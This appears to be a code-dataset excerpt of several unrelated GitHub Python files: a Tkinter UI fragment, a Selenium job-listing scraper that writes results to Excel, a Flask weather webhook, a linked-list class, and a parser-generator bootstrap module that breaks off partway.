rely=0.368, height=79, width=167)\n self.Label3_2.configure(activebackground=\"#f9f9f9\")\n self.Label3_2.configure(anchor='w')\n self.Label3_2.configure(background=\"#252a40\")\n self.Label3_2.configure(compound='left')\n self.Label3_2.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_2.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_2.configure(foreground=\"#f2f2f2\")\n self.Label3_2.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_2.configure(highlightcolor=\"black\")\n self.Label3_2.configure(text='''Diâmetro [m]:''')\n\n self.Label2 = tk.Label(self.top)\n self.Label2.place(relx=0.039, rely=0.068, height=74, width=702)\n self.Label2.configure(activebackground=\"#f9f9f9\")\n self.Label2.configure(anchor='w')\n self.Label2.configure(background=\"#f2f2f2\")\n self.Label2.configure(compound='center')\n self.Label2.configure(disabledforeground=\"#a3a3a3\")\n self.Label2.configure(font=\"-family {Segoe UI} -size 36 -weight bold\")\n self.Label2.configure(foreground=\"#007ef9\")\n self.Label2.configure(highlightbackground=\"#d9d9d9\")\n self.Label2.configure(highlightcolor=\"black\")\n self.Label2.configure(text='''Cálculo do volume''')\n\n self.Label3_3 = tk.Label(self.top)\n self.Label3_3.place(relx=0.716, rely=0.07, height=79, width=307)\n self.Label3_3.configure(activebackground=\"#f9f9f9\")\n self.Label3_3.configure(anchor='w')\n self.Label3_3.configure(background=\"#2e3349\")\n self.Label3_3.configure(compound='left')\n self.Label3_3.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_3.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_3.configure(foreground=\"#ffffff\")\n self.Label3_3.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_3.configure(highlightcolor=\"black\")\n self.Label3_3.configure(text='''Volume:''')\n\n self.Button1.configure(command=self.calcular)\n\n\ndef start_up():\n tela_support.main()\n\n\nif __name__ == '__main__':\n tela_support.main()\n","repo_name":"ubiratantavares/puc_minas_iot_industrial_programacao_para_desenvolvimento_iiot","sub_path":"aula4/tela.py","file_name":"tela.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9579051034","text":"# from os import system\n\n# system('pip install -r requirements.txt')\n\nimport datetime\nimport requests\nimport openpyxl\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium import webdriver\nfrom threading import Thread\nfrom 
selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\n\ndef prepare_soup(link:str) -> BeautifulSoup:\n '''\n argument -- link:str\n return -- parsed HTML:BeautifulSoup if successful\n False:bool if failed\n '''\n html = requests.get(link)\n if html.status_code == 200:\n # open('a.txt','w',encoding='utf-8').write(html.text)\n return BeautifulSoup(html.text, \"html.parser\")\n else:\n return False\n\ndef filters():\n title = input(\"Enter job title to search for: \")\n location = input('Enter job location: ')\n postage = int(input(\"\"\"Posted withtin:\n 1. Last 24 hours\n 2. Last 3 days\n 3. Last 7 days\n 4. Last 14 days\n 0. All\n \"\"\"))\n job_type = int(input(\"\"\"Job Type:\n 1. Permanent\n 2. Contract\n 3. Temporary\n 4. Part Time\n 0. All\n\"\"\"))\n salary = int(input(\"\"\" Salary:\n 1. at least £10,000 \n 2. at least £20,000 \n 3. at least £30,000 \n 4. at least £40,000 \n 5. at least £50,000 \n 6. at least £60,000 \n 7. at least £70,000 \n 8. at least £80,000 \n 9. at least £90,000 \n 10. at least £100,000\n 0. All\n \"\"\"))\n N = int(input('Enter number of jobs to be scraped from each site:'))\n return title, location, postage, job_type, salary, N\n\n\n\n\n\ndef open_browser(driver, url):\n driver.get(url) \n return driver\n\n\n\n\ndef click_on_filter(driver, element):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, element))\n )\n element.click()\n\n\n\n\ndef write_xl(df,filename, sheet):\n with pd.ExcelWriter(filename, engine=\"openpyxl\", mode=\"a\") as writer:\n df.to_excel(writer, sheet_name=sheet, index=False, encoding='utf-8')\n\n\n\n\n# soup = None\n\ndef efc(driver, JOBTITLE, LOCATION): \n\n def get_efc_descr(link):\n soup = prepare_soup(link)\n if not soup:\n return ''\n desc = soup.find_all('div',{'class':'jobContentFrame'})[0]\n summary = desc.text.strip()\n return summary\n\n\n age_dict = {0:'', 1 : \"ONE\", 2 : \"THREE\", 3 : \"SEVEN\", 4 : \"SEVEN\"}\n type_dict = [\"CONTRACT\", \"PERMANENT\",\"TEMPORARY\", \"INTERNSHIPS_AND_GRADUATE_TRAINEE\"]\n type_dict.insert(0, '%7C'.join(type_dict))\n if sal_fltr < 4: sal = 'FIRST'\n elif sal_fltr < 8: sal = 'SECOND'\n else: sal = \"THIRD_TIER|FOURTH_TIER|FIFTH_TIER|SIXTH\"\n url = f'https://www.efinancialcareers.com/search/?q={JOBTITLE}&location={LOCATION}&page=1&pageSize=100&filters.postedDate={age_dict[age_fltr]}&filters.positionType={type_dict[jt_fltr]}&filters.salaryBand={sal}_TIER'\n print('fetching from site:', url)\n if age_fltr == 0: \n url = url.replace('&filters.postedDate=','')\n driver = open_browser(driver, url)\n try:\n\n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, \"/html/body/dhi-job-search/dhi-search-page-container/dhi-search-page/div/dhi-search-page-results/div/div[3]/js-search-display/div/div[2]/dhi-search-cards-widget/div/dhi-new-search-card[1]/div\")))\n html = driver.page_source\n # global soup\n soup = BeautifulSoup(html, \"html.parser\")\n for job in soup.findAll('div', 'search-card'):\n if count >= N: \n break\n count += 1\n\n new_link = 'https://www.efinancialcareers.com/' 
+ job.find_all('a',{'class':'card-title-link bold'})[0].attrs['href']\n summary = get_efc_descr(new_link)\n # summary = 'test'\n\n data.append([job.a.text.strip(),\n job.find('div', 'card-salary ng-star-inserted').text.strip(),\n job.find(id = 'searchResultLocation').text.strip(),\n job.find('span', {'data-cy' : 'card-posted-date'}).text.strip(),\n job.find('span', {'data-cy' : 'search-result-employment-type'}).text.strip(),\n summary\n # job.find('div', {'data-cy' : 'card-summary'}).text.strip() + '...'\n ])\n try:\n next_btn = None\n # next_btn = driver.find_element(By.XPATH, \"/html/body/dhi-job-search/dhi-search-page-container/dhi-search-page/div/dhi-search-page-results/div/div[3]/js-search-display/div/div[3]/div[1]/js-search-pagination-container/pagination/ul/li[5]/a\")\n next_btn = driver.find_elements_by_class_name('page-link')\n next_btn[-1].click()\n except NoSuchElementException:\n pass\n except Exception as e:\n # print(e)\n break\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print('An error occured:', e)\n finally:\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, 'efinancialcareers')\n # driver.close()\n print('done')\n\ndef multi_site(driver, JOBTITLE, LOCATION, site = 'cw'):\n url_dict = {\"cw\":'https://www.cwjobs.co.uk',\n \"total\":\"https://www.totaljobs.com\",\n \"jobsite\": \"https://www.jobsite.co.uk/\",\n \"city\": \"https://www.cityjobs.com/\"\n }\n sal_element = f'//*[@id=\"facetListAnnualPayRate\"]/ul/li[{sal_fltr}]/a'\n age_element = f'//*[@id=\"facetListDatePosted\"]/div[2]/ul/li[{age_fltr}]/a'\n jt_element = f'//*[@id=\"facetListJobType\"]/div[2]/ul/li[{jt_fltr}]/a'\n url = url_dict[site]\n print('fetching from site:', url)\n open_browser(driver, url)\n try:\n cookie = driver.find_element_by_class_name(\"privacy-prompt-button.primary-button.accept-button-new\")\n cookie.click()\n except:\n pass\n title_field = driver.find_element_by_id(\"keywords\")\n title_field.send_keys(JOBTITLE)\n loc_field = driver.find_element_by_id(\"location\")\n loc_field.send_keys(LOCATION)\n search_btn = driver.find_element_by_id(\"search-button\")\n search_btn.click()\n try: \n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"col-sm-9.job-results\"))\n )\n if sal_fltr != 0:\n click_on_filter(driver, sal_element)\n if age_fltr != 0:\n click_on_filter(driver, age_element)\n if jt_fltr != 0:\n click_on_filter(driver, jt_element)\n html = driver.page_source\n soup = BeautifulSoup(html, \"html.parser\")\n link_ct = 0\n for job in soup.find_all('div', 'job'):\n link_ct += 1\n if not \"ci-advert-job\" in job['class']:\n if count >= N: \n break\n count += 1\n try:\n links = driver.find_elements_by_class_name('job-title')\n data.append([job.find('h2').text,\n job.find('li', 'salary').text,\n job.find('li', 'location').span.text.replace('\\n', ''),\n job.find('li', 'date-posted').span.text.strip(),\n job.find('li', 'job-type').span.text])\n except:\n print('Some jobs in this site have incomplete information to scrape. 
Skipping those...')\n # job.find('p', 'job-intro').text])\n try:\n link = links[count].find_element_by_tag_name('a')\n main_window = driver.current_window_handle\n action = ActionChains(driver)\n \n action.key_down(Keys.CONTROL).key_down(Keys.SHIFT).click(link).key_up(Keys.CONTROL).key_up(Keys.SHIFT).perform()\n\n driver.switch_to.window(driver.window_handles[-1])\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"job-description\")))\n desc = driver.page_source\n desc = BeautifulSoup(desc, \"html.parser\")\n p = desc.find('div', \"job-description\").text.strip()\n\n data[-1].append(p)\n # driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 'w')\n driver.close()\n driver.switch_to.window(main_window)\n except Exception as e:\n pass\n # print(e)\n try:\n link_ct = 0\n next_btn = None\n next_btn = driver.find_element_by_class_name('btn.btn-default.next')\n next_btn.click()\n except NoSuchElementException:\n pass\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print(\"An error occured: \",e)\n\n finally:\n print('done')\n df = pd.DataFrame(data, columns=['Job Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, site)\n # driver.close()\n\n\ndef indeed(driver, JOBTITLE, LOCATION):\n\n def indeed_job_description(link):\n soup = prepare_soup(link)\n if not soup:\n return ''\n summary = soup.find(id='jobDescriptionText').text.strip()\n return summary\n \n base_url = 'https://uk.indeed.com'\n\n type_list = ['','permanent','contract','temporary', 'parttime']\n age = {1:1,2:3,3:7,4:14,0:''}\n sal = sal_fltr*10000 if sal_fltr > 0 else ''\n url = f'https://uk.indeed.com/jobs?q={JOBTITLE}+£{sal}&l={LOCATION}&jt={type_list[jt_fltr]}&fromage={age[age_fltr]}'\n if jt_fltr == 0: \n url = url.replace('&jt=', '')\n if age_fltr == 0: \n url = url.replace('&fromage=', '')\n if sal_fltr == 0: \n url = url.replace('+£','')\n print('fetching from site:', url)\n try:\n data = []\n count = 0\n next_btn = True\n while(count < N and next_btn is not None):\n open_browser(driver, url)\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID, \"resultsCol\"))\n )\n html = driver.page_source\n soup = BeautifulSoup(html, \"html.parser\")\n links = driver.find_elements_by_class_name('title')\n link_ct = 0\n for job in soup.findAll('div', 'jobsearch-SerpJobCard'):\n link_ct += 1\n if count >= N: \n break\n count += 1\n\n try:\n salary = job.find_all('span',{'class':'salaryText'})[0].text.strip()\n except:\n salary = '-NA-'\n # try:\n # driver.find_element_by\n # except:\n # intro = '-NA-'\n job_title = job.h2.a.text.strip()\n _location = job.find('span', 'location').text.strip()\n _date = job.find('span', 'date').text.strip()\n _type = type_list[jt_fltr]\n\n # click to new tab\n new_link = base_url + job.h2.a.attrs['href']\n _intro = indeed_job_description(new_link)\n\n data.append([job_title,\n salary,\n _location,\n _date,\n _type,\n _intro\n ])\n #click on job card\n # links[count].find_element_by_tag_name('a').click()\n driver.back()\n try:\n link_ct = 0\n next_btn = None\n next_btn = driver.find_element(By.XPATH, '//*[@id=\"resultsCol\"]/nav/div/ul')\n pos = url.find('&start=')\n if pos != -1:\n url = url[:pos]\n url = url + '&start='+str((count // 10) * 10)\n except NoSuchElementException:\n pass\n except TimeoutException:\n print('No search result found')\n except Exception as e:\n print('An error occured:', e)\n finally:\n df = pd.DataFrame(data, columns=['Job 
Title', 'Salary', 'Location', 'Post Date', 'Type', 'Intro'])\n write_xl(df, filename, 'indeed')\n # driver.close()\n print('done')\n\ndef format_filename(name):\n for i in set(name):\n if not i.isalnum():\n name = name.replace(i, '_')\n return name\n\n\nif __name__ == '__main__':\n timestamp = str(datetime.datetime.now())\n filename = format_filename(timestamp) + '.xlsx'\n writer = openpyxl.Workbook()\n writer.save(filename)\n title, location, age_fltr, jt_fltr, sal_fltr, N = filters()\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--headless')\n chrome_options.add_argument(\"--disable-notifications\")\n chrome_options.add_argument(\"--disable-popup-blocking\")\n driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)\n # driver = webdriver.Chrome(ChromeDriverManager().install())\n multi_site(driver, title, location, site=\"cw\")\n multi_site(driver, title, location, site=\"total\")\n multi_site(driver, title, location, site=\"jobsite\")\n multi_site(driver, title, location, site=\"city\")\n efc(driver, title, location)\n indeed(driver, title, location)\n # Thread(target = efc(\"web-dev\", \"london\")).start()\n # Thread(target = multi_site(\"web-dev\", \"london\")).start()\n driver.quit()\n","repo_name":"VishnuNarayananSR/Freelancing","sub_path":"7-Jobsite-scraping/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":14244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31377662408","text":"from flask import Flask, request, make_response\nimport json\nfrom flask_cors import CORS, cross_origin\nfrom weather import city_weather\n\napp = Flask(__name__)\n\n@app.route('/webhook', methods=['POST'])\n@cross_origin()\ndef weather():\n res = request.json\n result = res.get('queryResult')\n param = result.get('parameters')\n city = param.get('geo-city')\n w = city_weather()\n\n resp = w.weather_in(city)\n resp = json.dumps(resp)\n r = make_response(resp)\n r.headers['content-type'] = 'application/json'\n return r\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"biswajitburagohain/dialogflow_weather_chatbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74453223529","text":"class Node:\r\n def __init__(self, data): # Instance attributes\r\n self.data = data # attribute called data\r\n self.next = None \r\n \r\n # Instance method ~ dunder method\r\n def __repr__(self):\r\n return self.data\r\n \r\nclass LinkedList:\r\n def __init__(self, nodes=None):\r\n self.head = None \r\n if nodes is not None:\r\n node = Node(data=nodes.pop(0))\r\n self.head = node\r\n for elem in nodes:\r\n node.next = Node(data=elem)\r\n node = node.next\r\n \r\n # Instance method ~ dunder method \r\n def __repr__(self): \r\n node = self.head\r\n nodes = []\r\n while node is not None:\r\n nodes.append(node.data)\r\n node = node.next\r\n nodes.append(\"None\")\r\n return \" -> \".join(nodes)\r\n\r\n \r\n\r\n ","repo_name":"davestroud/Algorithm_Fundamentals","sub_path":"Facebook/Linked_Lists/Linked_List.py","file_name":"Linked_List.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"9987075613","text":"# -*- coding: utf-8 -*-\n#! \\file ./doit/text/pgen/readers/glap/bootstrap/__init__.py\n#! \\author Jiří Kučera, \n#! 
\\stamp 2016-12-19 02:04:45 (UTC+01:00, DST+00:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nGLAP bootstrap.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nfrom doit.support.utils import \\\n Functor\n\nfrom doit.support.cmd.runtime import \\\n Location\n\nfrom doit.support.cmd.commands import \\\n Const, \\\n MacroNode, MacroNodeSequence, MacroNodeAtom, MacroNodeParam, \\\n Expand, \\\n SetLocal, GetLocal, \\\n DefMacro, Define, DefModule, \\\n Add, Sub, Mul, Div, Mod, Neg, \\\n BitAnd, BitOr, BitXor, ShiftL, ShiftR, Inv, \\\n Lt, Gt, Le, Ge, Eq, Ne, Is, \\\n And, Or, Not, \\\n NewPair, NewList, NewHashMap, \\\n Concat, Join, Merge, \\\n Contains, \\\n GetItem, \\\n Lambda, \\\n Block, If, Foreach, While, DoWhile, Break, Continue, \\\n Call, Return, \\\n TryCatchFinally, Throw, Rethrow, \\\n SetItem, \\\n SetMember, GetMember\n\nfrom doit.text.pgen.errors import \\\n ParsingError\n\nfrom doit.text.pgen.readers.reader import \\\n Reader\n\nfrom doit.text.pgen.models.action import \\\n AddExpr as AAddExpr, SubExpr as ASubExpr, MulExpr as AMulExpr, \\\n DivExpr as ADivExpr, ModExpr as AModExpr, \\\n BitAndExpr as ABitAndExpr, BitOrExpr as ABitOrExpr, \\\n BitXorExpr as ABitXorExpr, \\\n ShiftLeftExpr as AShiftLeftExpr, ShiftRightExpr as AShiftRightExpr, \\\n NegExpr as ANegExpr, InvExpr as AInvExpr, \\\n EqExpr as AEqExpr, NotEqExpr as ANotEqExpr, LtExpr as ALtExpr, \\\n GtExpr as AGtExpr, LeExpr as ALeExpr, GeExpr as AGeExpr, \\\n LogAndExpr as ALogAndExpr, LogOrExpr as ALogOrExpr, NotExpr as ANotExpr, \\\n CallExpr as ACallExpr, \\\n IndexExpr as AIndexExpr, AccessExpr as AAccessExpr, \\\n Id as AId, IntLiteral as AIntLiteral, FloatLiteral as AFloatLiteral, \\\n StringLiteral as AStringLiteral, \\\n Block as ABlock, \\\n Assign as AAssign, InplaceAdd as AInplaceAdd, InplaceSub as AInplaceSub, \\\n InplaceMul as AInplaceMul, InplaceDiv as AInplaceDiv, \\\n InplaceMod as AInplaceMod, InplaceBitAnd as AInplaceBitAnd, \\\n InplaceBitOr as AInplaceBitOr, InplaceBitXor as AInplaceBitXor, \\\n InplaceShiftLeft as AInplaceShiftLeft, \\\n InplaceShiftRight as AInplaceShiftRight, \\\n If as AIf, Case as ACase, For as AFor, While as AWhile, \\\n DoWhile as ADoWhile, Continue as AContinue, Break as ABreak, \\\n Return as AReturn, ReturnWithValue as AReturnWithValue\n\nfrom doit.text.pgen.models.cfgram import \\\n Epsilon, Sym, Literal, Var, 
Range, Action, \\\n SetMinus\n\nfrom doit.text.pgen.readers.glap.bootstrap.pp.commands import \\\n DefRule, DefGrammar\n\nie_ = lambda msg: \"%s (%s; %s)\" % (\n msg,\n \"internal error\",\n \"if you see this text, the command compiler is probably buggy\"\n)\nmn_ = lambda ncls, ctx, loc, *args: (\n ncls(*args).set_location(*make_location(ctx, loc))\n)\n\ndef make_location(context, loc = -1):\n \"\"\"\n \"\"\"\n\n stream = context.stream\n if loc < 0:\n loc = stream.pos\n s = stream.data[0 : loc]\n lineno = s.count('\\n') + 1\n if lineno > 1:\n s = s.split('\\n')[-1]\n colno = len(s) + 1\n return stream.name, lineno, colno\n#-def\n\nclass SetLocation(Functor):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, file, lineno, colno):\n \"\"\"\n \"\"\"\n\n Functor.__init__(self, file, lineno, colno)\n #-def\n\n def __call__(self, node):\n \"\"\"\n \"\"\"\n\n node.set_location(*self.args)\n #-def\n#-class\n\nclass GlapLexError(ParsingError):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, context, detail, loc = -1):\n \"\"\"\n \"\"\"\n\n name, lineno, colno = make_location(context, loc)\n ParsingError.__init__(self, \"In <%s> at [%d:%d]: %s\" % (\n name, lineno, colno, detail\n ))\n #-def\n#-class\n\nclass GlapSyntaxError(ParsingError):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, context, detail, loc = -1):\n \"\"\"\n \"\"\"\n\n p = context.lexer.token.position() if context.lexer.token else -1\n name, lineno, colno = make_location(context, p if loc < 0 else loc)\n ParsingError.__init__(self, \"In <%s> at [%d:%d]: %s\" % (\n name, lineno, colno, detail\n ))\n #-def\n#-class\n\nclass GlapContext(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'stream', 'lexer', 'parser', 'actions', 'env', 'processor' ]\n\n def __init__(self):\n \"\"\"\n \"\"\"\n\n self.stream = None\n self.lexer = None\n self.parser = None\n self.actions = None\n self.env = None\n self.processor = None\n #-def\n#-class\n\nclass GlapStream(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'context', 'name', 'data', 'pos', 'size' ]\n\n def __init__(self, context, name, s):\n \"\"\"\n \"\"\"\n\n context.stream = self\n self.context = context\n self.name = name\n self.data = s\n self.pos = 0\n self.size = len(s)\n #-def\n\n def peek(self, n):\n \"\"\"\n \"\"\"\n\n return self.data[self.pos : self.pos + n]\n #-def\n\n def next(self, n = 1):\n \"\"\"\n \"\"\"\n\n self.pos += n\n #-def\n\n def match(self, p):\n \"\"\"\n \"\"\"\n\n if self.peek(len(p)) != p:\n raise GlapLexError(self.context, \"Expected %r\" % p)\n self.pos += len(p)\n return p\n #-def\n\n def matchset(self, set):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[self.pos - 1]\n raise GlapLexError(self.context,\n \"Expected one of [%s]\" % repr(set)[1:-1]\n )\n #-def\n\n def matchif(self, f, fname):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[self.pos - 1]\n raise GlapLexError(self.context, \"Expected %s\" % fname)\n #-def\n\n def matchmany(self, set):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[p : self.pos]\n #-def\n\n def matchmanyif(self, f):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[p : self.pos]\n #-def\n\n def matchplus(self, set):\n \"\"\"\n \"\"\"\n\n m = self.matchset(set)\n return \"%s%s\" % (m, self.matchmany(set))\n #-def\n\n def 
matchplusif(self, f, fname):\n \"\"\"\n \"\"\"\n\n m = self.matchif(f, fname)\n return \"%s%s\" % (m, self.matchmanyif(f))\n #-def\n\n def matchopt(self, set, default):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[self.pos - 1]\n return default\n #-def\n\n def matchoptif(self, f, default):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[self.pos - 1]\n return default\n #-def\n\n def matchn(self, set, n):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while n > 0 and self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n n -= 1\n if n > 0:\n raise GlapLexError(self.context,\n \"Expected one of [%s]\" % repr(set)[1:-1]\n )\n return self.data[p : self.pos]\n #-def\n\n def matchnif(self, f, n, fname):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while n > 0 and self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n n -= 1\n if n > 0:\n raise GlapLexError(self.context, \"Expected %s\" % fname)\n return self.data[p : self.pos]\n #-def\n#-class\n\nclass GlapCompileCmdHelper(object):\n \"\"\"\n \"\"\"\n UNSPECIFIED = -1\n NULLARY_EXPR = 0\n UNARY_EXPR = 1\n BINARY_EXPR = 2\n INDEX_EXPR = 3\n ACCESS_EXPR = 4\n ASSIGN_EXPR = 5\n NARY_EXPR = 6\n CALL_EXPR = 7\n LAMBDA_EXPR = 8\n EXPAND = 9\n VARIABLE = 10\n STATEMENT = 11\n DEFMACRO_STATEMENT = 12\n DEFINE_STATEMENT = 13\n MACRO_NODE_NULLARY = 14\n MACRO_NODE_UNARY = 15\n MACRO_NODE_BINARY = 16\n MACRO_NODE_INDEX = 17\n MACRO_NODE_ACCESS = 18\n MACRO_NODE_ASSIGN = 19\n MACRO_NODE_NARY = 20\n MACRO_NODE_CALL = 21\n MACRO_NODE_LAMBDA = 22\n MACRO_EXPAND = 23\n MACRO_VARIABLE = 24\n MACRO_PARAM = 25\n MACRO_STATEMENT = 26\n __slots__ = [\n 'kind', 'node', 'code', 'vars', 'value_holder', 'context', 'location',\n 'errmsg'\n ]\n\n def __init__(self, context, location, errmsg):\n \"\"\"\n \"\"\"\n\n self.kind = self.UNSPECIFIED\n self.node = None\n self.code = []\n self.vars = []\n self.value_holder = None\n self.context = context\n self.location = location\n self.errmsg = errmsg\n #-def\n\n def remove_duplicated_vars(self):\n \"\"\"\n \"\"\"\n\n vars = []\n for v in self.vars:\n if v not in vars:\n vars.append(v)\n self.vars = vars\n #-def\n\n def value_expr(self):\n \"\"\"\n \"\"\"\n\n if self.value_holder is None:\n raise GlapSyntaxError(self.context, self.errmsg, self.location)\n return self.value_holder\n #-def\n\n @classmethod\n def checknode(cls, context, loc, node):\n \"\"\"\n \"\"\"\n\n errmsg = \"\"\n inmacro = context.actions.inmacro\n if node.kind >= cls.MACRO_NODE_NULLARY and not inmacro:\n errmsg = \"Macro node was detected outside macro definition\"\n if node.kind < cls.MACRO_NODE_NULLARY and inmacro:\n errmsg = \"Non-macro node was detected inside macro definition\"\n if errmsg != \"\":\n raise GlapSyntaxError(context, ie_(errmsg), loc)\n #-def\n\n @classmethod\n def make_unary(cls, context, loc, expr, unop):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, expr)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_UNARY\n o.node = MacroNode(unop, expr.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.UNARY_EXPR\n o.node = unop(expr.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(expr.code)\n o.vars.extend(expr.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_binary(cls, context, loc, lhs, rhs, binop):\n 
\"\"\"\n \"\"\"\n\n cls.checknode(context, loc, lhs)\n cls.checknode(context, loc, rhs)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_BINARY\n o.node = MacroNode(binop, lhs.value_expr(), rhs.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.BINARY_EXPR\n o.node = binop(lhs.value_expr(), rhs.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(lhs.code)\n o.code.extend(rhs.code)\n o.vars.extend(lhs.vars)\n o.vars.extend(rhs.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_index(cls, context, loc, expr, idx):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, expr)\n cls.checknode(context, loc, idx)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_INDEX\n o.node = MacroNode(GetItem, expr.value_expr(), idx.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.INDEX_EXPR\n o.node = GetItem(expr.value_expr(), idx.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(expr.code)\n o.code.extend(idx.code)\n o.vars.extend(expr.vars)\n o.vars.extend(idx.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_access(cls, context, loc, module, member):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, module)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_ACCESS\n o.node = MacroNode(\n GetMember, module.value_expr(), MacroNodeAtom(member.value())\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.ACCESS_EXPR\n o.node = GetMember(module.value_expr(), member.value())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(module.code)\n o.vars.extend(module.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_assign(cls, context, loc, lhs, rhs, inplaceop = None):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, lhs)\n cls.checknode(context, loc, rhs)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_ASSIGN\n else:\n o.kind = cls.ASSIGN_EXPR\n if lhs.kind in (cls.VARIABLE, 